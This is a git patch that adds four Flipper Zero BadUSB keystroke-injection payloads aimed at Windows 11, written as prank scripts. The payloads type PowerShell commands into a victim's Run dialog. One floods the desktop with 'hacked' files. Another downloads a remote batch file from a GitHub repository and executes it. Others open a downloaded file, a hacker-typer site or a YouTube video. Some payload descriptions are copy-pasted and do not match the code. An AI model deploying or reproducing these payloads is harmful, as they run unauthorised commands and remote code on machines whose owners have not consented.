From 6067a3a5b44356e352024d3872ebb33086a4b772 Mon Sep 17 00:00:00 2001 From: Yann <30565751+SeenKid@users.noreply.github.com> Date: Tue, 21 Mar 2023 09:50:16 +0100 Subject: [PATCH] Add files via upload --- windows11/You have been hacked desktop.txt | 12 ++++++++++++ windows11/hackertyper.txt | 11 +++++++++++ windows11/matrix.txt | 12 ++++++++++++ windows11/nyancat.txt | 18 ++++++++++++++++++ 4 files changed, 53 insertions(+) create mode 100644 windows11/You have been hacked desktop.txt create mode 100644 windows11/hackertyper.txt create mode 100644 windows11/matrix.txt create mode 100644 windows11/nyancat.txt diff --git a/windows11/You have been hacked desktop.txt b/windows11/You have been hacked desktop.txt new file mode 100644 index 0000000..d293ed8 --- /dev/null +++ b/windows11/You have been hacked desktop.txt @@ -0,0 +1,12 @@ +REM Author: SeenKid (seenkid#1337 on Discord) +REM Description: Creates a lot of files with the text you have been hacked on desktop. +REM Version: 1.0 +DELAY 800 +GUI r +DELAY 800 +STRING powershell +ENTER +DELAY 800 +STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/hacked.txt -OutFile $DesktopPath/H4ck3D.txt; while($ac -lt 200) { Copy-Item "$DesktopPath/H4ck3D.txt" -Destination "$DesktopPath/hacked$ac.txt"; $ac++};Start-Process -FilePath "$DesktopPath/H4ck3D.txt" +DELAY 600 +ENTER \ No newline at end of file diff --git a/windows11/hackertyper.txt b/windows11/hackertyper.txt new file mode 100644 index 0000000..cdd835a --- /dev/null +++ b/windows11/hackertyper.txt @@ -0,0 +1,11 @@ +REM Author: SeenKid (seenkid#1337 on Discord) +REM Description: Starts a matrix command prompt +REM Version: 1.0 +DELAY 800 +GUI r +DELAY 800 +STRING https://hackertyper.io/ +ENTER +DELAY 2000 +F11 +STRING SeenKid IS THE BEST \ No newline at end of file diff --git a/windows11/matrix.txt b/windows11/matrix.txt new file mode 100644 index 0000000..4521cd9 --- /dev/null +++ b/windows11/matrix.txt @@ -0,0 +1,12 @@ +REM Author: SeenKid (seenkid#1337 on Discord) +REM Description: Starts a matrix command prompt +REM Version: 1.0 +DELAY 500 +GUI r +DELAY 900 +STRING powershell +ENTER +DELAY 900 +STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/matrix.bat -OutFile "$DesktopPath/matrix.bat"; Start-Process "cmd.exe" "/c $DesktopPath/matrix.bat;" +DELAY 200 +ENTER \ No newline at end of file diff --git a/windows11/nyancat.txt b/windows11/nyancat.txt new file mode 100644 index 0000000..f87adb3 --- /dev/null +++ b/windows11/nyancat.txt @@ -0,0 +1,18 @@ +REM Author: SeenKid (seenkid#1337 on Discord) +REM Description: Creates a lot of files with the text you have been hacked on desktop. +REM Version: 1.0 +DELAY 700 +GUI r +DELAY 700 +STRING powershell +ENTER +DELAY 700 +STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/nyancat.txt -OutFile $DesktopPath/nyan.txt; Start-Process -FilePath "$DesktopPath/nyan.txt" +DELAY 600 +ENTER +DELAY 1000 +GUI r +DELAY 600 +STRING https://youtu.be/QH2-TGUlwu4 +DELAY 600 +ENTER \ No newline at end of file